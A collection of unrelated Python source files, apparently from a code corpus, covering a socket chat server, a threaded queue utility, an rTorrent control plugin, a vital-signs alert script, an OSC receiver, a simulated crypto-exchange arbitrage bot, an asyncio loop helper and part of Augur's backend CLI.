s.bind((SERVER_HOST, SERVER_PORT))
# listen for incoming connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
def listen_for_client(cs):
"""
This function keeps listening for messages from the `cs` socket.
Whenever a message is received, it is broadcast to all other connected clients.
"""
while True:
try:
# keep listening for a message from `cs` socket
msg = cs.recv(1024).decode()
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
client_sockets.remove(cs)
else:
# if we received a message, replace the <SEP>
# token with ": " for nice printing
msg = msg.replace(separator_token, ": ")
# iterate over all connected sockets
for client_socket in client_sockets:
# and send the message
client_socket.send(msg.encode())
while True:
# we keep listening for new connections all the time
client_socket, client_address = s.accept()
print(f"[+] {client_address} connected.")
# add the new connected client to connected sockets
client_sockets.add(client_socket)
# start a new thread that listens for each client's messages
t = Thread(target=listen_for_client, args=(client_socket,))
# make the thread daemon so it ends whenever the main thread ends
t.daemon = True
# start the thread
t.start()
# close client sockets
for cs in client_sockets:
cs.close()
# close server socket
s.close()
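# --- Illustrative companion client (a sketch, not part of the original server) ---
# The server above broadcasts whatever it receives after replacing the "<SEP>"
# token with ": ", so a matching client prefixes each outgoing message with its
# chosen name and the same token. The function below is hypothetical and would
# normally live in a separate client script.
def example_client(name, host="127.0.0.1", port=SERVER_PORT):
    client = socket.socket()
    client.connect((host, port))

    def receive():
        # print every broadcast the server sends us
        while True:
            print(client.recv(1024).decode())

    Thread(target=receive, daemon=True).start()
    while True:
        text = input()
        if text.lower() == "q":
            break
        client.send(f"{name}{separator_token}{text}".encode())
    client.close()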
|
threaded_queues.py
|
import csv
import queue
import threading
class ThreadedQueue(queue.Queue):
"""Abstract implementation of a multi-threaded queue processor
To implement a concrete multi-threaded queue processor based on ThreadedQueue, the following methods must be implemented:
process_item(item)
"""
def __init__(self, threads, *args, **kwargs):
"""Initialize instance dependencies and start the specified number of threads"""
super().__init__(*args, **kwargs)
self.exception = None
self.is_running = False
self.start(threads)
def start(self, threads):
"""Start the specified number of threads"""
if not self.is_running:
self.is_running = True
for thread_count in range(threads):
thread = threading.Thread(target=self.do_work, daemon=True)
thread.start()
def do_work(self):
"""Repeatedly get items and process them"""
while self.is_running:
item = None
try:
item = self.get_nowait()
except queue.Empty:
pass
if item is not None:
try:
self.process_item(item)
except BaseException as e:
self.stop(e)
finally:
self.task_done()
def put(self, item):
"""Add item to the queue if the queue is running"""
if self.is_running:
super().put(item)
def stop(self, exception=None):
"""Stop all threads"""
if self.is_running:
self.is_running = False
if exception is not None and self.exception is None:
self.exception = exception
self.clear()
def clear(self):
"""Remove all pending items from the queue without processing them"""
while not self.empty():
try:
self.get_nowait()
self.task_done()
except queue.Empty:
pass
class WorkerQueue(ThreadedQueue):
"""A concrete implementation of ThreadedQueue that processes worker tasks"""
def add_item(self, target, target_args=None, target_kwargs=None, callback=None):
"""Add an item to the queue"""
self.put({
'target': target,
'target_args': target_args,
'target_kwargs': target_kwargs,
'callback': callback
})
def process_item(self, item):
"""Process the specified item"""
target = item['target']
target_args = item['target_args']
target_kwargs = item['target_kwargs']
callback = item['callback']
if target_args is None: target_args=[]
if target_kwargs is None: target_kwargs={}
output = target(*target_args, **target_kwargs)
if callback is not None:
callback(output)
class QueuedCsvWriter(ThreadedQueue):
"""A concrete implementation of ThreadedQueue that allows multiple threads to write to a single CSV file"""
def __init__(self, csv_file, *args, **kwargs):
super().__init__(threads=1, *args, **kwargs)
self.csv_writer = csv.writer(csv_file)
def writerow(self, row):
"""Add the specified row to the queue"""
self.put(row)
def process_item(self, row):
"""Write the specified row to the output file"""
self.csv_writer.writerow(row)
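# --- Illustrative usage sketch (not part of the original module) ---
# A minimal demo of the two concrete queues, assuming the hypothetical worker
# function and output file name below; run this module directly to try it.
if __name__ == '__main__':
    import time

    def square(n):
        time.sleep(0.05)   # stand-in for real work
        return n * n

    results = []
    work = WorkerQueue(threads=4)
    for i in range(10):
        work.add_item(target=square, target_args=[i], callback=results.append)
    work.join()            # block until every queued item has been processed
    work.stop()
    if work.exception:     # surface the first worker exception, if any
        raise work.exception

    with open('squares.csv', 'w', newline='') as f:
        writer = QueuedCsvWriter(f)
        writer.writerow(['n', 'n_squared'])
        for value in sorted(results):
            writer.writerow([int(value ** 0.5), value])
        writer.join()      # wait for the single writer thread to flush every row
        writer.stop()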
|
rtorrent.py
|
import datetime
import os
import re
import requests
import threading
import xmlrpc.client
from pathlib import Path
from typing import List, Optional
from platypush.context import get_bus
from platypush.plugins import action
from platypush.plugins.torrent import TorrentPlugin
from platypush.message.event.torrent import \
TorrentDownloadStartEvent, TorrentDownloadedMetadataEvent, TorrentDownloadProgressEvent, \
TorrentDownloadCompletedEvent, TorrentPausedEvent, TorrentResumedEvent, TorrentQueuedEvent, TorrentRemovedEvent, \
TorrentEvent
class RtorrentPlugin(TorrentPlugin):
"""
Plugin to search, download and manage torrents through RTorrent.
The usage of this plugin is advised over :class:`platypush.plugins.torrent.TorrentPlugin`, as RTorrent is a more
flexible and optimized solution for downloading and managing torrents compared to the Platypush native plugin.
Configuration:
- Install ``rtorrent`` on your system - on Debian/Ubuntu/Raspbian::
apt-get install rtorrent
- Configure the ``rtorrent`` XML/RPC interface, usually by adding the following lines to your
``~/.rtorrent.rc``:
.. code-block:: text
# Enable XML/RPC
scgi_local = /home/user/.rpc.socket
- Use a web server to bridge the RPC interface exposed by RTorrent over HTTP. Some configuration examples are
available `here <https://github.com/rakshasa/rtorrent/wiki/RPC-Setup-XMLRPC>`_. I usually use ``lighttpd``
because it's easy to configure and it comes with a built-in SCGI module. Install the server e.g. using
``apt``::
apt-get install lighttpd
- Create a base configuration file like this under e.g. ``~/.config/rtorrent/lighttpd.conf``:
.. code-block:: text
### Base configuration
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
)
# Make sure that all the directories exist.
# server.document-root isn't really needed, but lighttpd
# won't start if it doesn't find a document root.
server.document-root = "/home/user/.local/share/rtorrent/html"
server.upload-dirs = ( "/home/user/.cache/uploads" )
server.errorlog = "/home/user/.local/log/rtorrent/error.log"
server.pid-file = "/home/user/.local/run/lighttpd.pid"
server.username = "your-user"
server.groupname = "your-group"
server.port = 5000
index-file.names = ( "index.html" )
### Configure the RTorrent XML/RPC endpoint
server.modules += ( "mod_scgi" )
scgi.server = (
# Bind an endpoint called /RPC2 to your local interface
"/RPC2" =>
( "127.0.0.1" =>
(
# Read from the RTorrent XML/RPC socket
"socket" => "/home/user/.rpc.socket",
"check-local" => "disable",
"disable-time" => 0, # don't disable scgi if connection fails
)
)
)
- Start the HTTP service, and optionally enable it as a system/user service::
lighttpd -f ~/.config/rtorrent/lighttpd.conf
- Start RTorrent and check that the XML/RPC interface works:
.. code-block:: bash
            $ xmlrpc localhost:5000 system.listMethods
# Should return a list with all the methods exposed by RTorrent.
$ xmlrpc localhost:5000 download_list
Result:
Array of 0 items:
- It is advised to let the RTorrent instance run in e.g. ``screen`` or ``tmux`` on the server machine - it is
more reliable than letting the plugin start/stop the instance, and you have an easy CLI interface to attach
to manage/monitor your torrents.
- In this example, the URL to configure in the plugin would be ``http://localhost:5000/RPC2``.
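    - As a quick sanity check, the same endpoint can also be queried from Python (illustrative
      snippet, not part of the plugin; adjust the URL to your setup):
      .. code-block:: python
          import xmlrpc.client
          client = xmlrpc.client.ServerProxy('http://localhost:5000/RPC2')
          # Should print the list of RPC methods exposed by RTorrent
          print(client.system.listMethods())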
Triggers:
* :class:`platypush.message.event.torrent.TorrentQueuedEvent` when a new torrent transfer is queued.
* :class:`platypush.message.event.torrent.TorrentRemovedEvent` when a torrent transfer is removed.
* :class:`platypush.message.event.torrent.TorrentDownloadStartEvent` when a torrent transfer starts.
* :class:`platypush.message.event.torrent.TorrentDownloadedMetadataEvent` when the metadata of a torrent
transfer has been downloaded.
* :class:`platypush.message.event.torrent.TorrentDownloadProgressEvent` when a transfer is progressing.
* :class:`platypush.message.event.torrent.TorrentPausedEvent` when a transfer is paused.
* :class:`platypush.message.event.torrent.TorrentResumedEvent` when a transfer is resumed.
* :class:`platypush.message.event.torrent.TorrentDownloadCompletedEvent` when a transfer is completed.
"""
def __init__(self, url: str, poll_seconds: float = 5.0, torrent_files_dir: str = '~/.rtorrent/watch', **kwargs):
"""
:param url: HTTP URL that exposes the XML/RPC interface of RTorrent (e.g. ``http://localhost:5000/RPC2``).
:param poll_seconds: How often the plugin will monitor for changes in the torrent state (default: 5 seconds).
:param torrent_files_dir: Directory where torrents and metadata files will be downloaded
(default: ``~/.rtorrent/watch``).
"""
super().__init__(**kwargs)
self.torrent_files_dir = os.path.abspath(os.path.expanduser(torrent_files_dir))
Path(self.torrent_files_dir).mkdir(parents=True, exist_ok=True, mode=0o755)
self._monitor_stop = threading.Event()
self._monitor_thread: Optional[threading.Thread] = None
self._last_status = {}
self._torrent_urls = {}
self._status_lock = threading.RLock()
self.poll_seconds = poll_seconds
self.url = url
self.client = xmlrpc.client.Server(self.url)
self.methods = set(self._list_methods())
self.start_monitor()
def _get_client(self) -> xmlrpc.client.Server:
return xmlrpc.client.Server(self.url)
def _fire_event(self, event: TorrentEvent, *_, **__):
bus = get_bus()
bus.post(event)
def _process_events(self, status: dict, last_status: dict):
if not status:
self._fire_event(TorrentRemovedEvent(**last_status))
return
if not last_status:
self._fire_event(TorrentQueuedEvent(**status))
progress = status.get('progress', 0)
name = status.get('name')
start_date = status.get('start_date')
finish_date = status.get('finish_date')
is_active = status.get('is_active')
if name and not last_status.get('name'):
self._fire_event(TorrentDownloadedMetadataEvent(**status))
if start_date and not last_status.get('start_date'):
self._fire_event(TorrentDownloadStartEvent(**status))
if is_active and not last_status.get('is_active'):
self._fire_event(TorrentResumedEvent(**status))
elif not is_active and last_status.get('is_active'):
self._fire_event(TorrentPausedEvent(**status))
if progress > 0:
if progress > last_status.get('progress', 0):
self._fire_event(TorrentDownloadProgressEvent(**status))
if finish_date and not last_status.get('finish_date'):
self._fire_event(TorrentDownloadCompletedEvent(**status))
def _torrent_monitor(self, *_, **__):
def thread():
self.logger.info('Starting torrent monitoring')
while not self._monitor_stop.is_set():
try:
# noinspection PyUnresolvedReferences
statuses = self.status().output
last_statuses = self._last_status.copy()
self._last_status = statuses
torrent_hashes = set(statuses.keys()).union(last_statuses.keys())
for torrent_hash in torrent_hashes:
self._process_events(statuses.get(torrent_hash, {}), last_statuses.get(torrent_hash, {}))
except Exception as e:
self.logger.warning('Error while monitoring torrent status')
self.logger.exception(e)
finally:
self._monitor_stop.wait(timeout=self.poll_seconds)
self.logger.info('Stopped torrent monitoring')
return thread
def _multicall(self, *args) -> List[list]:
if 'd.multicall2' in self.methods:
return self.client.d.multicall2('', *args)
if 'd.multicall' in self.methods:
return self.client.d.multicall(*args)
raise AssertionError('No multicall method available on the rtorrent interface')
@action
def start_monitor(self):
"""
Start monitoring the status of the RTorrent instance.
"""
if self._monitor_thread and self._monitor_thread.is_alive():
self.logger.info('Torrent monitoring already running')
return
self._monitor_stop.clear()
self._monitor_thread = threading.Thread(target=self._torrent_monitor())
self._monitor_thread.start()
@action
def stop_monitor(self):
"""
Stop monitoring the status of the RTorrent instance.
"""
if not (self._monitor_thread and self._monitor_thread.is_alive()):
self.logger.info('Torrent monitoring already stopped')
else:
self._monitor_stop.set()
self._monitor_thread.join(timeout=60.0)
self._monitor_thread = None
@action
def download_torrent_file(self, torrent: str) -> str:
"""
Download a torrent link to ``torrent_files_dir``.
:param torrent: Torrent URL, magnet link or local file.
:return: Path to the locally downloaded .torrent file.
"""
if torrent.startswith('magnet:?'):
# Magnet link: extract and download
m = re.search(r'xt=urn:btih:([^&/]+)', torrent)
assert m, 'Invalid magnet link: {}'.format(torrent)
torrent_hash = m.group(1)
torrent_file = os.path.join(self.torrent_files_dir, '{}.torrent'.format(torrent_hash))
with open(torrent_file, 'w') as f:
f.write('d10:magnet-uri{length}:{info}e'.format(length=len(torrent), info=torrent))
self._torrent_urls[torrent_hash] = torrent
return torrent_file
if torrent.startswith('http://') or torrent.startswith('https://'):
# HTTP resource
info = requests.get(torrent).text
torrent_file = os.path.join(self.torrent_files_dir, torrent.split('/')[-1])
if not torrent_file.endswith('.torrent'):
torrent_file += '.torrent'
with open(torrent_file, 'w') as f:
f.write(info)
self._torrent_urls[torrent_file.split('.')[0]] = torrent
return torrent_file
# Local torrent file
torrent_file = os.path.abspath(os.path.expanduser(torrent))
assert os.path.isfile(torrent_file), 'No such torrent file: {}'.format(torrent)
self._torrent_urls[os.path.basename(torrent_file).split('.')[0]] = 'file://' + torrent
return torrent_file
@action
def download(self, torrent: str, is_media: bool = False, *_, **__):
"""
Download a torrent.
:param torrent: Torrent to download. Supported formats:
* Magnet URLs
* Torrent URLs
* Local torrent files
:param is_media: Set it to true if you're downloading a media file that you'd like to stream as soon as the
first chunks are available. If so, then the events and the status method will only include media files
:return: The status of the torrent.
"""
# noinspection PyUnresolvedReferences
torrent_file = self.download_torrent_file(torrent).output
client = self._get_client()
client.load.start('', torrent_file)
def _list_methods(self) -> List[str]:
return self.client.system.listMethods()
@action
def list_methods(self) -> List[str]:
"""
:return: The list of methods exposed by the RTorrent instance
"""
return list(self.methods)
@action
def status(self, torrent: str = None) -> dict:
"""
Get the status of the current transfers.
:param torrent: Torrent hash.
:returns: A dictionary:
.. code-block:: json
{
"HASH1234567890": {
"hash": "HASH1234567890",
"name": "Your torrent name",
"save_path": "/home/user/Downloads/Your torrent name",
"is_active": true,
"is_open": true,
"completed_bytes": 666894336,
"download_rate": 451345,
"is_multi_file": true,
"remaining_bytes": 1482827011,
"size_bytes": 2149721347,
"load_date": "2020-09-02T18:42:19",
"peers": 0,
"state": "paused",
"start_date": "2020-09-02T18:42:19",
"finish_date": null,
"upload_rate": 143967,
"progress": 31.0,
"files": ["list", "of", "downloaded", "files"]
}
}
"""
attrs = ['hash', 'name', 'save_path', 'is_active', 'is_open', 'completed_bytes', 'download_rate',
'is_multi_file', 'remaining_bytes', 'size_bytes', 'load_date', 'peers', 'start_date',
'finish_date', 'upload_rate']
cmds = ['d.hash=', 'd.name=', 'd.directory=', 'd.is_active=', 'd.is_open=', 'd.completed_bytes=',
'd.down.rate=', 'd.is_multi_file=', 'd.left_bytes=', 'd.size_bytes=', 'd.load_date=',
'd.peers_connected=', 'd.timestamp.started=', 'd.timestamp.finished=', 'd.up.rate=']
mappers = {
'is_active': lambda v: bool(v),
'is_open': lambda v: bool(v),
'is_multi_file': lambda v: bool(v),
'load_date': lambda v: datetime.datetime.fromtimestamp(v) if v else None,
'start_date': lambda v: datetime.datetime.fromtimestamp(v) if v else None,
'finish_date': lambda v: datetime.datetime.fromtimestamp(v) if v else None,
}
with self._status_lock:
torrents = {
info[0]: {
attr: mappers[attr](info[i]) if attr in mappers else info[i]
for i, attr in enumerate(attrs)
}
for info in self._multicall('', *cmds)
}
for torrent_id, info in torrents.items():
torrents[torrent_id]['progress'] = round(100. * (info['completed_bytes']/info['size_bytes']), 1)
torrents[torrent_id]['url'] = self._torrent_urls.get(torrent_id, torrent_id)
torrents[torrent_id]['is_paused'] = not info['is_active']
            torrents[torrent_id]['paused'] = not info['is_active']  # Backwards compatibility with TorrentPlugin
            torrents[torrent_id]['size'] = info['size_bytes']  # Backwards compatibility with TorrentPlugin
torrents[torrent_id]['files'] = []
if not info['is_open']:
torrents[torrent_id]['state'] = 'stopped'
elif not info['is_active']:
torrents[torrent_id]['state'] = 'paused'
else:
torrents[torrent_id]['state'] = 'downloading'
if info.get('save_path'):
torrents[torrent_id]['files'] = list(str(f) for f in Path(info['save_path']).rglob('*')) \
if info.get('is_multi_file') else info['save_path']
return torrents.get(torrent, {}) if torrent else torrents
@action
def open(self, torrent: str) -> dict:
"""
Open a loaded torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.open(torrent)
return self.status(torrent).output
@action
def pause(self, torrent: str) -> dict:
"""
Pause a torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.pause(torrent)
return self.status(torrent).output
@action
def resume(self, torrent) -> dict:
"""
Resume a torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.resume(torrent)
return self.status(torrent).output
@action
def stop(self, torrent) -> dict:
"""
Stop a torrent transfer.
:param torrent: Torrent hash.
:return: The status of the torrent.
"""
self.client.d.stop(torrent)
return self.status(torrent).output
@action
def remove(self, torrent):
"""
Stop and remove a torrent transfer (without removing the downloaded files).
:param torrent: Torrent hash.
"""
self.client.d.stop(torrent)
self.client.d.erase(torrent)
@action
def quit(self):
"""
Terminate all the active transfers and quit the monitor.
"""
# noinspection PyUnresolvedReferences
torrents = list(self.status().output.keys()).copy()
for torrent in torrents:
self.remove(torrent)
self.stop_monitor()
@action
def execute(self, method: str, *args, **kwargs):
"""
Execute a raw command over the RTorrent RPC interface.
:param method: Method name.
:param args: Method arguments.
:param kwargs: Method keyword-arguments.
:return: Anything returned by the RPC method.
"""
method = getattr(self.client, method)
return method(*args, **kwargs)
# vim:sw=4:ts=4:et:
|
Implement.py
|
import time
import threading
import Input_module
from Analyzer import Analyzer
import Output_Module
def process():
# user_id, age, gender, heartrate, Systolic_BP, Diastolic_BP, blood_oxygen, temperature, time):
#def __init__(self, Systolic_BP, Diastolic_BP, Heart_Rate, Heart_Oxy_Level, Body_temp):
data=Input_module.input()
time.sleep(0.5)
    for idx, content in enumerate(data):
        analyzer = Analyzer(content["Systolic_BP"], content["Diastolic_BP"], content["heartrate"], content["blood_oxygen"], content["temperature"])
        signal_loss = analyzer.Signal_Loss(content["heartrate"], content["temperature"])
        shock_alert = analyzer.Shock_Alert(content["heartrate"], content["temperature"])
        oxygen_supply = analyzer.Oxygen_Supply(content["blood_oxygen"])
        fever = analyzer.Fever(content["temperature"])
        hypotension = analyzer.Hypotension(content["Systolic_BP"], content["Diastolic_BP"])
        hypertension = analyzer.Hypertension(content["Systolic_BP"], content["Diastolic_BP"])
        result = Output_Module.display_basic_iuput_data(signal_loss, shock_alert, oxygen_supply, fever, hypotension, hypertension)
        print('--------------------------------------')
        print('Patient No', idx, 'Alert')
        for index in result:
            print(index, ':', result[index])
def main():
#t1 = threading.Thread(target=Input_module.input())
t2 = threading.Thread(target=process)
#t1.start()
t2.start()
#t1.join()
t2.join()
if __name__ == '__main__':
main()
|
osc_receive.py
|
#!/usr/bin/python
import OSC
import time, threading
# tuple with (ip, port).
receive_address = '127.0.0.1' , 7000
# OSC Server.
s = OSC.OSCServer(receive_address)
# this registers a 'default' handler (for unmatched messages),
# an '/error' handler and an '/info' handler.
# And, if the client supports it, a '/subscribe' & '/unsubscribe' handler
s.addDefaultHandlers()
def B(addr, tags, stuff, source):
# print addr #/print
# print tags #sif
print stuff #['Test', 2500, 3.140000104904175]
# print source #('127.0.0.1', 40232)
def samplerate(addr, tags, stuff, source):
print ""
s.addMsgHandler("/print", B) # adding our function
s.addMsgHandler("/_samplerate", samplerate) #OSC client automatically sends sample rate data, just routing to do mostly nothing
# just checking which handlers we have added
print "Registered Callback-functions are :"
for addr in s.getOSCAddressSpace():
print addr
# Start OSCServer
print "\nStarting OSCServer. Use ctrl-C to quit."
st = threading.Thread( target = s.serve_forever )
st.start()
try :
while 1 :
time.sleep(5)
except KeyboardInterrupt :
print "\nClosing OSCServer."
s.close()
print "Waiting for Server-thread to finish"
st.join() ##!!!
print "Done"
|
btccpro_okspot.py
|
import logging
import config
import time
from .observer import Observer
from .emailer import send_email
from fiatconverter import FiatConverter
from private_markets import okcoincny,btccprocny
import os
import sys
import json
import threading
import traceback
from .basicbot import BasicBot
# python3 arbitrage/arbitrage.py -oBTCCPro_OkSpot -mBtccProCNY,OKCoinCNY
class BTCCPro_OkSpot(BasicBot):
exchange = 'BtccProCNY'
hedger = 'OKCoinCNY'
def __init__(self):
super().__init__()
self.clients = {
"OKCoinCNY": okcoincny.PrivateOkCoinCNY(config.OKCOIN_API_KEY, config.OKCOIN_SECRET_TOKEN),
"BtccProCNY": btccprocny.PrivateBtccProCNY(),
}
self.trade_wait = config.trade_wait # in seconds
self.last_trade = 0
self.init_btc = {'OKCoinCNY':500, 'BtccProCNY':500}
self.init_cny = {'OKCoinCNY':100, 'BtccProCNY':100}
self.spread = 0.1
        self.simulate = True
t = threading.Thread(target = self.msg_server)
t.start()
logging.info('BTCCPro_OkSpot Setup complete')
# time.sleep(2)
def process_message(self,message):
kexchange = self.exchange
try:
message = message.decode('utf-8')
message = json.loads(message)
logging.info('msg:%s', message)
type = message['type']
price = message['price']
logging.info('msg type:%s %s', type, price)
if type == 'buy':
buy_orders = self.get_orders('buy')
buy_orders.sort(key=lambda x: x['price'], reverse=True)
for buy_order in buy_orders:
if buy_order['price'] == price:
self.cancel_order(kexchange, 'buy', buy_order['id'])
break
elif type == 'sell':
sell_orders = self.get_orders('sell')
sell_orders.sort(key=lambda x: x['price'])
for sell_order in sell_orders:
if sell_order['price'] == price:
self.cancel_order(kexchange, 'sell', sell_order['id'])
break
except Exception as e:
logging.error("process message exception %s", e)
traceback.print_exc()
def hedgeALG1(self, depths):
# update price
try:
bid_price = (depths[self.exchange]["bids"][0]['price'])
ask_price = (depths[self.exchange]["asks"][0]['price'])
bid_amount = int(depths[self.exchange]["bids"][0]['amount'])
ask_amount= int(depths[self.exchange]["asks"][0]['amount'])
hedger_bid_price = (depths[self.hedger]["bids"][0]['price'])
hedger_ask_price = (depths[self.hedger]["asks"][0]['price'])
hedger_bid_amount = (depths[self.hedger]["bids"][0]['amount'])
hedger_ask_amount = (depths[self.hedger]["asks"][0]['amount'])
except Exception as ex:
logging.warn("exception depths:%s" % ex)
traceback.print_exc()
return
if bid_price == 0 or ask_price == 0 or hedger_bid_price == 0 or hedger_ask_price == 0:
logging.info("exception ticker %s %s %s %s", bid_price ,ask_price,hedger_bid_price,hedger_ask_price)
return
        # Parallel strategy 1:
        # When the BTCC price (BTCC best bid) minus the OKCoin price (OKCoin best ask) is greater than -2,
        # buy X BTC of OKCoin spot (at the ask price + 0.1 CNY to ease execution)
        # and sell X BTC of BTCC spot (X is the size of the BTCC best bid).
        # Parallel strategy 2:
        # When the BTCC price minus the OKCoin price is less than -8, sell Y BTC of OKCoin spot
        # (at the bid price - 0.1 CNY) and buy Y BTC of BTCC spot (Y is the size of the BTCC best ask).
        # The three values -2, -8 and 0.1 are intended to become configurable later.
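        # Worked example (illustrative numbers only): with a BTCC best bid of 2000.0 and an
        # OKCoin best ask of 2001.5, the difference is -1.5, which is greater than -2, so
        # strategy 1 fires: sell 1 BTC on BTCC at 1999.9 (bid - spread) and buy 1 BTC on
        # OKCoin at 2001.6 (ask + spread).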
# Update client balance
self.update_balance()
logging.info("maker:%s %s %s %s", bid_price, bid_amount, ask_price, ask_amount)
logging.info("hedger:%s %s %s %s", hedger_bid_price, hedger_bid_amount, hedger_ask_price, hedger_ask_amount)
logging.info("bid_price - hedger_ask_price=%0.2f", bid_price - hedger_ask_price)
logging.info("ask_price - hedger_bid_price=%0.2f", ask_price - hedger_bid_price)
current_time = time.time()
if current_time - self.last_trade < self.trade_wait:
logging.warn("Can't automate this trade, last trade " +
"occured %.2f seconds ago" %
(current_time - self.last_trade))
return
if bid_price - hedger_ask_price > -2:
hedge_amount = int(min(bid_amount, 1))
if hedge_amount < 1:
logging.warn("sell in btcc %s , buy in ok %s ..too small [%s]btc", bid_price, hedger_ask_price, hedge_amount)
return
btc_balance = int(self.clients[self.exchange].cny_balance/(bid_price-self.spread))
if btc_balance < hedge_amount:
logging.warn("btcc btc balance %s insufficent", btc_balance)
return
if self.clients[self.hedger].cny_balance < hedge_amount*(hedger_ask_price+self.spread):
logging.warn("okcoin cny balance %s insufficent", self.clients[self.hedger].cny_balance )
return
logging.info("sell in btcc %s , buy in ok %s [%s]btc", bid_price, hedger_ask_price, hedge_amount)
            if not self.simulate:
self.new_order(self.exchange, 'sell', maker_only=False, amount=hedge_amount, price=bid_price-self.spread)
self.new_order(self.hedger, 'buy', maker_only=False, amount=hedge_amount, price=hedger_ask_price+self.spread)
self.last_trade = time.time()
elif ask_price - hedger_bid_price < -8 :
hedge_amount = int(min(ask_amount, 1))
if hedge_amount < 1:
logging.warn("sell in ok %s, buy in btcc %s ..insufficent [%s]btc", ask_price, hedger_bid_price, hedge_amount)
return
btc_balance = int(self.clients[self.exchange].cny_balance/(ask_price+self.spread))
if btc_balance < hedge_amount:
logging.warn("btcc cny balance %s insufficent", btc_balance)
return
if self.clients[self.hedger].btc_balance < hedge_amount:
logging.warn("okcoin btc balance %s insufficent", self.clients[self.hedger].btc_balance )
return
logging.info("sell in ok %s, buy in btcc %s [%s]btc", ask_price, hedger_bid_price, hedge_amount)
            if not self.simulate:
self.new_order(self.exchange, 'buy', maker_only=False, amount=hedge_amount, price=ask_price+self.spread)
                self.new_order(self.hedger, 'sell', maker_only=False, amount=hedge_amount, price=hedger_bid_price-self.spread)  # sell on the hedger just below its best bid
self.last_trade = time.time()
def update_trade_history(self, time, price, cny, btc):
filename = self.out_dir + self.filename
need_header = False
if not os.path.exists(filename):
need_header = True
fp = open(filename, 'a+')
if need_header:
fp.write("timestamp, price, cny, btc\n")
fp.write(("%d") % time +','+("%.2f") % price+','+("%.2f") % cny+','+ str(("%.4f") % btc) +'\n')
fp.close()
def update_balance(self):
for kclient in self.clients:
self.clients[kclient].get_info()
def begin_opportunity_finder(self, depths):
self.hedgeALG1(depths)
def end_opportunity_finder(self):
pass
def opportunity(self, profit, volume, buyprice, kask, sellprice, kbid, perc, weighted_buyprice, weighted_sellprice):
pass
|
DynamicEventLoop.py
|
import asyncio
import threading
class DynamicEventLoop:
    '''Runs an asyncio event loop in a dedicated thread so that coroutines can be
    scheduled on (and removed from) it dynamically.
    '''
def __init__(
self,
loop: asyncio.AbstractEventLoop = None,
thread: threading.Thread = None
):
        'Set up the event loop and the separate thread that will run it'
# Creating Event Loop
if loop is not None:
self.loop = loop
else:
try:
self.loop = asyncio.get_event_loop()
except RuntimeError:
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
# Creating thread
if thread is not None:
self.thread = thread
else:
self.thread = threading.Thread(
target=lambda x: x.run_forever(),
args=(self.loop,)
)
self.taskList = {}
self.temp = [None, None]
def run(self):
'Starting Event Loop'
self.thread.start()
def append(self, mark, coroutine):
        '''Append a coroutine to the event loop and return the updated task list.
        ``mark`` can be any hashable value and is used as the key to look the task up later;
        ``coroutine`` must be a coroutine object.
        '''
self.taskList.update(
{
mark: self.loop.create_task(coroutine)
}
)
        # Wake the loop up so it picks up the newly created task
        # (this relies on the private _csock attribute of the default selector event loop)
        self.loop._csock.send(b'\0')
return self.taskList
def pop(self, mark):
        '''Cancel the task registered under ``mark`` and remove it from the task list.'''
try:
self.taskList.pop(mark).cancel() # Cancel the task
except KeyError:
return 'Incorrect Mark!'
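# Illustrative usage sketch (not part of the original module); the names below are
# hypothetical, and the wake-up hack in append() relies on implementation details of the
# default selector event loop, so this is only meant to show the intended flow:
#
#   import asyncio
#
#   async def greet():
#       await asyncio.sleep(1)
#       print('hello')
#
#   del_loop = DynamicEventLoop()
#   del_loop.run()                        # start the loop in its own thread
#   del_loop.append('greeting', greet())  # schedule a coroutine dynamically
#   del_loop.pop('greeting')              # cancel it again if it is still pending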
|
backend.py
|
#SPDX-License-Identifier: MIT
"""
Augur library commands for controlling the backend components
"""
from copy import deepcopy
import os, time, atexit, subprocess, click, atexit, logging, sys
import psutil
import signal
import multiprocessing as mp
import gunicorn.app.base
from gunicorn.arbiter import Arbiter
from augur.cli import initialize_logging, pass_config, pass_application
from augur.housekeeper import Housekeeper
from augur.server import Server
from augur.application import Application
from augur.gunicorn import AugurGunicornApp
logger = logging.getLogger("augur")
@click.group('server', short_help='Commands for controlling the backend API server & data collection workers')
def cli():
pass
@cli.command("start")
@click.option("--disable-housekeeper", is_flag=True, default=False, help="Turns off the housekeeper")
@click.option("--skip-cleanup", is_flag=True, default=False, help="Disables the old process cleanup that runs before Augur starts")
@click.option("--logstash", is_flag=True, default=False, help="Runs logstash to collect errors from logs")
@click.option("--logstash-with-cleanup", is_flag=True, default=False, help="Runs logstash to collect errors from logs and cleans all previously collected errors")
def start(disable_housekeeper, skip_cleanup, logstash, logstash_with_cleanup):
"""
Start Augur's backend server
"""
augur_app = Application()
logger.info("Augur application initialized")
logger.info(f"Using config file: {augur_app.config.config_file_location}")
if not skip_cleanup:
logger.debug("Cleaning up old Augur processes...")
_broadcast_signal_to_processes()
time.sleep(2)
else:
logger.debug("Skipping process cleanup")
if logstash or logstash_with_cleanup:
augur_home = os.getenv('ROOT_AUGUR_DIRECTORY', "")
if logstash_with_cleanup:
print("Cleaning old workers errors...")
with open(augur_home + "/log_analysis/http/empty_index.html") as f:
lines = f.readlines()
with open(augur_home + "/log_analysis/http/index.html", "w") as f1:
f1.writelines(lines)
print("All previous workers errors got deleted.")
elasticsearch_path = os.getenv('ELASTIC_SEARCH_PATH', "/usr/local/bin/elasticsearch")
subprocess.Popen(elasticsearch_path)
logstash_path = os.getenv('LOGSTASH_PATH', "/usr/local/bin/logstash")
subprocess.Popen([logstash_path, "-f", augur_home + "/log_analysis/logstash-filter.conf"])
master = initialize_components(augur_app, disable_housekeeper)
logger.info('Starting Gunicorn webserver...')
logger.info(f'Augur is running at: http://127.0.0.1:{augur_app.config.get_value("Server", "port")}')
logger.info('Gunicorn server logs & errors will be written to logs/gunicorn.log')
logger.info('Housekeeper update process logs will now take over.')
Arbiter(master).run()
@cli.command('stop')
@initialize_logging
def stop():
"""
Sends SIGTERM to all Augur server & worker processes
"""
_broadcast_signal_to_processes(given_logger=logging.getLogger("augur.cli"))
@cli.command('kill')
@initialize_logging
def kill():
"""
Sends SIGKILL to all Augur server & worker processes
"""
